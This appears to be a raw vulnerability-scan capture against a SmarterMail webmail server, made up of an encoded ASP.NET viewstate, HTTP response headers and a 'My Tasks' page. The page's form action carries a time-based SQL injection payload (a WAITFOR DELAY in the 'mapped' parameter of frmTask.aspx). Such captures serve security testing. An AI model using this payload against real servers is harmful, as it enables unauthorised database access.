ZWtnEAUHMiB3ZWVrcwUHMiB3ZWVrc2dkZAIFD2QWAgIBD2QWAmYPEGQPFgtmAgECAgIDAgQCBQIGAgcCCAIJAgoWCxAFATAFATBnEAUBMQUBMWcQBQEyBQEyZxAFATMFATNnEAUBNAUBNGcQBQE1BQE1ZxAFATYFATZnEAUBNwUBN2cQBQE4BQE4ZxAFATkFATlnEAUCMTAFAjEwZ2RkAgYPZBYCAgEPZBYCZg8QZA8WBGYCAQICAgMWBBAFC05vdCBTdGFydGVkBQtOb3QgU3RhcnRlZGcQBQpJbiBQcm9jZXNzBQpJbiBQcm9jZXNzZxAFCUNvbXBsZXRlZAUJQ29tcGxldGVkZxAFCENhbmNlbGVkBQhDYW5jZWxlZGdkZAIHD2QWAgIBD2QWAmYPEGQPFgtmAgECAgIDAgQCBQIGAgcCCAIJAgoWCxAFATAFATBnEAUCMTAFAjEwZxAFAjIwBQIyMGcQBQIzMAUCMzBnEAUCNDAFAjQwZxAFAjUwBQI1MGcQBQI2MAUCNjBnEAUCNzAFAjcwZxAFAjgwBQI4MGcQBQI5MAUCOTBnEAUDMTAwBQMxMDBnZGQCBA9kFgICAQ9kFgJmD2QWAmYPDxYEHwgFDkluZGVudCBTZXR0aW5nHwkCAmRkAgYPZBYEAgMPDxYCHwcFATBkZAIFDw8WAh8HZWRkGAQFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYIBSVjdGwwMCRNUEgkU3RhcnREYXRlUGlja2VyX1NldHRpbmdUZXh0BS5jdGwwMCRNUEgkU3RhcnREYXRlUGlja2VyX1NldHRpbmdUZXh0JGNhbGVuZGFyBS5jdGwwMCRNUEgkU3RhcnREYXRlUGlja2VyX1NldHRpbmdUZXh0JGNhbGVuZGFyBS5jdGwwMCRNUEgkU3RhcnREYXRlUGlja2VyX1NldHRpbmdUZXh0JHRpbWVWaWV3BSNjdGwwMCRNUEgkRW5kRGF0ZVBpY2tlcl9TZXR0aW5nVGV4dAUsY3RsMDAkTVBIJEVuZERhdGVQaWNrZXJfU2V0dGluZ1RleHQkY2FsZW5kYXIFLGN0bDAwJE1QSCRFbmREYXRlUGlja2VyX1NldHRpbmdUZXh0JGNhbGVuZGFyBSxjdGwwMCRNUEgkRW5kRGF0ZVBpY2tlcl9TZXR0aW5nVGV4dCR0aW1lVmlldwUXY3RsMDAkVFBIJFRhYlN0cmlwJFRhYjIPMtwLAAEAAAD%2f%2f%2f%2f%2fAQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAAtAQ2F0ZWdvcmllcwH1%2f%2f%2f%2f%2fP%2f%2f%2fwYMAAAACFNlbGVjdGVkCAEAAfP%2f%2f%2f%2f8%2f%2f%2f%2fBg4AAAAKUGFnZVZpZXdJRAYPAAAADUNhdGVnb3JpZXNUYWILZAUXY3RsMDAkVFBIJFRhYlN0cmlwJFRhYjMPMt4LAAEAAAD%2f%2f%2f%2f%2fAQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAAxARGVzY3JpcHRpb24B9f%2f%2f%2f%2fz%2f%2f%2f8GDAAAAAhTZWxlY3RlZAgBAAHz%2f%2f%2f%2f%2fP%2f%2f%2fwYOAAAAClBhZ2VWaWV3SUQGDwAAAA5EZXNjcmlwdGlvblRhYgtkBRdjdGwwMCRUUEgkVGFiU3RyaXAkVGFiMQ8y1gsAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2f%2f%2f%2f%2fP%2f%2f%2fwYHAAAABFRleHQKAfj%2f%2f%2f%2f8%2f%2f%2f%2fBgkAAAAKUmVzb3VyY2VJRAYKAAAACEBEZXRhaWxzAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAAKT3B0aW9uc1RhYgtk9e1blg9ItMmce8gXf%2bTGvdVB1aA%3d

Injection Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 09:12:07 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 2563
Connection: Close


Identification Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 12:05:33 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16429
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Tasks - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmTask.aspx?mapped=')%3bWAITFOR+DELAY+'0%3a0%3a25'--&amp;user=dummy&amp;popup=true" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMTA0NjI1MzI3DxYGHghfX19UaXRsZQUITXkgVGFza3MeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgwCAg9kFgICAQ8WAh4HVmlzaWJsZWhkAgMPZBYEAgEPZBYCAgUPDxYCHwNoZGQCAw9kFgICAQ8PFgQeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFD3dpbmRvdy5jbG9zZSgpO2RkAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HwNoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCQ9kFgICAQ9kFgJmD2QWAgIDD2QWBgICD2QWAgIBD2QWDgIBDw8WAh8DaGQWBGYPDxYGHghDc3NDbGFzcwUMSW5kZW50IEZpeGVkHwcFDFJlbGF0ZWQgSXRlbR4EXyFTQgICZGQCAQ8PFgQfCAUIIFNldHRpbmcfCQICZGQCAg9kFgICAQ9kFgJmD2QWAmYPZBYCZg9kFgRmDw8WEB4cRW5hYmxlRW1iZWRkZWRCYXNlU3R5bGVzaGVldGgeE0VuYWJsZUVtYmVkZGVkU2tpbnNoHgRTa2luBQxTbWFydGVyVG9vbHMeB01heERhdGUGAADbmXo/MQkfCQICHgxTZWxlY3RlZERhdGUGwPeK80owzUgfCAUWRGF0ZVRpbWVQaWNrZXJPdmVycmlkZR4HTWluRGF0ZQYAQFcgUwVRCGQWCmYPFCsACA8WGB8KaB8LaB4NT3JpZ2luYWxWYWx1ZQUUMTAvMi8yMDEwIDE6MTU6MDAgUE0eDEF1dG9Qb3N0QmFja2ceCkRhdGVGb3JtYXQFAWceEURpc3BsYXlEYXRlRm9ybWF0BQFnHwcFEzIwMTAtMTAtMDItMTMtMTUtMDAeDUxhYmVsQ3NzQ2xhc3MFB3JpTGFiZWweF0VuYWJsZUFqYXhTa2luUmVuZGVyaW5naB8NBgAA25l6PzEJHwwFDFNtYXJ0ZXJUb29scx8PBgBAVyBTBVEIZBYGHgVXaWR0aBsAAAAAAABZQAcAAAAfCAURcmlUZXh0Qm94IHJpSG92ZXIfCQKCAhYGHxYbAAAAAAAAWUAHAAAAHwgFEXJpVGV4dEJveCByaUVycm9yHwkCggIWBh8WGwAAAAAAAFlABwAAAB8IBRNyaVRleHRCb3ggcmlGb2N1c2VkHwkCggIWBh8WGwAAAAAAAFlABwAAAB8IBRNyaVRleHRCb3ggcmlFbmFibGVkHwkCggIWBh8WGwAAAAAAAFlABwAAAB8IBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8JAoICFgYfFhsAAAAAAABZQAcAAAAfCAURcmlUZXh0Qm94IHJpRW1wdHkfCQKCAhYGHxYbAAAAAAAAWUAHAAAAHwgFEHJpVGV4dEJveCByaVJlYWQfCQKCAmQCAQ8PFgQeCEltYWdlVXJsBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh4NSG92ZXJJbWFnZVVybAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh4Hb25jbGljawVLcmV0dXJuIENhbGVuZGFyUG9wdXAoJGZpbmQoJ2N0bDAwX01QSF9TdGFydERhdGVQaWNrZXJfU2V0dGluZ1RleHQnKSwnY2FsJyk7ZAICDxQrAA0PFhoFFkZhc3ROYXZpZ2F0aW9uUHJldlRleHRlBQtTcGVjaWFsRGF5cw8FkgFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5DYWxlbmRhckRheUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuMzUsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFFkZhc3ROYXZpZ2F0aW9uTmV4dFRleHRlBRFFbmFibGVNdWx0aVNlbGVjdGgFD1JlbmRlckludmlzaWJsZWcFDlJvd0hlYWRlckltYWdlBSkvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0LmdpZgUSTmF2aWdhdGlvbk5leHRUZXh0ZQUETWluRAYAQFcgUwVRCAUDRVJTaAUNU2VsZWN0ZWREYXRlcw8FjwFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5EYXRlVGltZUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuMzUsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFEk5hdmlnYXRpb25QcmV2VGV4dGUFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1heEQGAADbmXo/MQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxVoZGQWBB8IBQtyY01haW5UYWJsZR8JAgIWBB8IBQxyY090aGVyTW9udGgfCQICZBYEHwgFCnJjU2VsZWN0ZWQfCQICZBYEHwgFCnJjRGlzYWJsZWQfCQICFgQfCAUMcmNPdXRPZlJhbmdlHwkCAhYEHwgFCXJjV2Vla2VuZB8JAgIWBB8IBQdyY0hvdmVyHwkCAhYEHwgFNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8JAgIWBB8IBQlyY1ZpZXdTZWwfCQICZAIDDw8WBB8XBS0vQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9VcGNvbWluZy5naWYfGAUtL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvVXBjb21pbmcuZ2lmFgIfGQVMcmV0dXJuIENhbGVuZGFyUG9wdXAoJGZpbmQoJ2N0bDAwX01QSF9TdGFydERhdGVQaWNrZXJfU2V0dGluZ1RleHQnKSwndGltZScpO2QCBA8UKwACDxYOHglTdGFydFRpbWUoKVxTeXN0ZW0uVGltZVNwYW4sIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQgwNzowMDowMB4HRW5kVGltZSgrBAgxOTowMDowMB4ISW50ZXJ2YWwoKwQIMDA6MTU6MDAfCmgfC2gfDAUMU21hcnRlclRvb2xzHxVoZBYEHwgFB3JjSG92ZXIfCQICFgJmDxQrAAkPFgYeDVJlcGVhdENvbHVtbnMCBB4IRGF0YUtleXMWAB4LXyFJdGVtQ291bnQCMGQWBB8IZR8JAgJkFgQfCGUfCQICZGQWBB8IBQhyY0hlYWRlch8JAgIWBB8IBQhyY0Zvb3Rlch8JAgIWBh8WGwAAAAAAQG9AAQAAAB8IBUlSYWRDYWxlbmRhclRpbWVWaWV3IFJhZENhbGVuZGFyVGltZVZpZXdfU21hcnRlclRvb2xzIFJhZENhbGVuZGFyVGltZVZpZXcgHwkCggIWYAIBD2QWAmYPFgIeCWlubmVyaHRtbAUHNzowMCBBTWQCAg9kFgJmDxYCHyAFBzc6MTUgQU1kAgMPZBYCZg8WAh8gBQc3OjMwIEFNZAIED2QWAmYPFgIfIAUHNzo0NSBBTWQCBQ9kFgJmDxYCHyAFBzg6MDAgQU1kAgYPZBYCZg8WAh8gBQc4OjE1IEFNZAIHD2QWAmYPFgIfIAUHODozMCBBTWQCCA9kFgJmDxYCHyAFBzg6NDUgQU1kAgkPZBYCZg8WAh8gBQc5OjAwIEFNZAIKD2QWAmYPFgIfIAUHOToxNSBBTWQCCw9kFgJmDxYCHyAFBzk6MzAgQU1kAgwPZBYCZg8WAh8gBQc5OjQ1IEFNZAIND2QWAmYPFgIfIAUIMTA6MDAgQU1kAg4PZBYCZg8WAh8gBQgxMDoxNSBBTWQCDw9kFgJmDxYCHyAFCDEwOjMwIEFNZAIQD2QWAmYPFgIfIAUIMTA6NDUgQU1kAhEPZBYCZg8WAh8gBQgxMTowMCBBTWQCEg9kFgJmDxYCHyAFCDExOjE1IEFNZAITD2QWAmYPFgIfIAUIMTE6MzAgQU1kAhQPZBYCZg8WAh8gBQgxMTo0NSBBTWQCFQ9kFgJmDxYCHyAFCDEyOjAwIFBNZAIWD2QWAmYPFgIfIAUIMTI6MTUgUE1kAhcPZBYCZg8WAh8gBQgxMjozMCBQTWQCGA9kFgJmDxYCHyAFCDEyOjQ1IFBNZAIZD2QWAmYPFgIfIAUHMTowMCBQTWQCGg9kFgJmDxYCHyAFBzE6MTUgUE1kAhsPZBYCZg8WAh8gBQcxOjMwIFBNZAIcD2QWAmYPFgIfIAUHMTo0NSBQTWQCHQ9kFgJmDxYCHyAFBzI6MDAgUE1kAh4PZBYCZg8WAh8gBQcyOjE1IFBNZAIfD2QWAmYPFgIfIAUHMjozMCBQTWQCIA9kFgJmDxYCHyAFBzI6NDUgUE1kAiEPZBYCZg8WAh8gBQczOjAwIFBNZAIiD2QWAmYPFgIfIAUHMzoxNSBQTWQCIw9kFgJmDxYCHyAFBzM6MzAgUE1kAiQPZBYCZg8WAh8gBQczOjQ1IFBNZAIlD2QWAmYPFgIfIAUHNDowMCBQTWQCJg9kFgJmDxYCHyAFBzQ6MTUgUE1kAicPZBYCZg8WAh8gBQc0OjMwIFBNZAIoD2QWAmYPFgIfIAUHNDo0NSBQTWQCKQ9kFgJmDxYCHyAFBzU6MDAgUE1kAioPZBYCZg8WAh8gBQc1OjE1IFBNZAIrD2QWAmYPFgIfIAUHNTozMCBQTWQCLA9kFgJmDxYCHyAFBzU6NDUgUE1kAi0PZBYCZg8WAh8gBQc2OjAwIFBNZAIuD2QWAmYPFgIfIAUHNjoxNSBQTWQCLw9kFgJmDxYCHyAFBzY6MzAgUE1kAjAPZBYCZg8WAh8gBQc2OjQ1IFBNZAIBDw8WAh8HBRExMC8yLzIwMTAgMToxNSBQTWRkAgMPZBYCAgEPZBYCZg9kFgJmD2QWAmYPZBYEZg8PFhAfCmgfC2gfDAUMU21hcnRlclRvb2xzHw0GAADbmXo/MQkfCQICHw4GwF9PVVMwzUgfCAUWRGF0ZVRpbWVQaWNrZXJPdmVycmlkZR8PBgBAVyBTBVEIZBYKZg8UKwAIDxYYHwpoHwtoHxAFFDEwLzIvMjAxMCAyOjE1OjAwIFBNHxFnHxIFAWcfEwUBZx8HBRMyMDEwLTEwLTAyLTE0LTE1LTAwHxQFB3JpTGFiZWwfFWgfDQYAANuZej8xCR8MBQxTbWFydGVyVG9vbHMfDwYAQFcgUwVRCGQWBh8WGwAAAAAAAFlABwAAAB8IBRFyaVRleHRCb3ggcmlIb3Zlch8JAoICFgYfFhsAAAAAAABZQAcAAAAfCAURcmlUZXh0Qm94IHJpRXJyb3IfCQKCAhYGHxYbAAAAAAAAWUAHAAAAHwgFE3JpVGV4dEJveCByaUZvY3VzZWQfCQKCAhYGHxYbAAAAAAAAWUAHAAAAHwgFE3JpVGV4dEJveCByaUVuYWJsZWQfCQKCAhYGHxYbAAAAAAAAWUAHAAAAHwgFFHJpVGV4dEJveCByaURpc2FibGVkHwkCggIWBh8WGwAAAAAAAFlABwAAAB8IBRFyaVRleHRCb3ggcmlFbXB0eR8JAoICFgYfFhsAAAAAAABZQAcAAAAfCAUQcmlUZXh0Qm94IHJpUmVhZB8JAoICZAIBDw8WBB8XBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh8YBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZhYCHxkFSXJldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfRW5kRGF0ZVBpY2tlcl9TZXR0aW5nVGV4dCcpLCdjYWwnKTtkAgIPFCsADQ8WGgUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy4zNSwgQ3Vs